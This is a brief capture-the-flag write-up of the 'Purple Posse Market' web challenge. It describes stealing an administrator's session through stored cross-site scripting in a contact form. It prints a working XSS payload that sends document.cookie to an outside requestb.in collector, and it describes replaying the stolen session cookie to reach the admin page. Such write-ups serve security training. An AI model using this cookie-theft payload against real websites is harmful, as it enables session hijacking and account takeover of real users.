Purple Posse Market was a Web Challenge where you had to steal the administrator’s personal information. This challenge deals with an application of cross site scripting attack.
You work for the government in the forensic department, you are investigating an illegal website which sells illegal drugs and weapons, you need to find a way to get the IBAN of the website’s amdinistrator.
Figure 1: Main page
This website looks like a simple store where you can order drugs, weapons and purple stuff !
There is also a Contact page where you can send an email to the administrator.
Figure 2: The administrator is currently online
The first thing that you might thinking about for this contact page is cookie stealing.
Figure 4: <script>document.write(‘<IMG SRC=\”http://requestb.in/xxxxxxxx?cookie=’+document.cookie+’\”>Hacked</IMG>’) ;</script>
A few seconds later the administrator visits our resquestb.in url which tells us that our XSS worked perfectly.
We now have the cookie “connect.sid” who belong to the administrator:
Let’s use this cookie and try to access the admin web page with this http header:
Finally we obtained this page:
Figure 4: http://purplepossemarket.quals.nuitduhack/admin
Which quite simply gives us the Flag: IBAN FR14 2004 1010 0505 0001 3M02 606
Many thanks to Sysdream for having organized this event.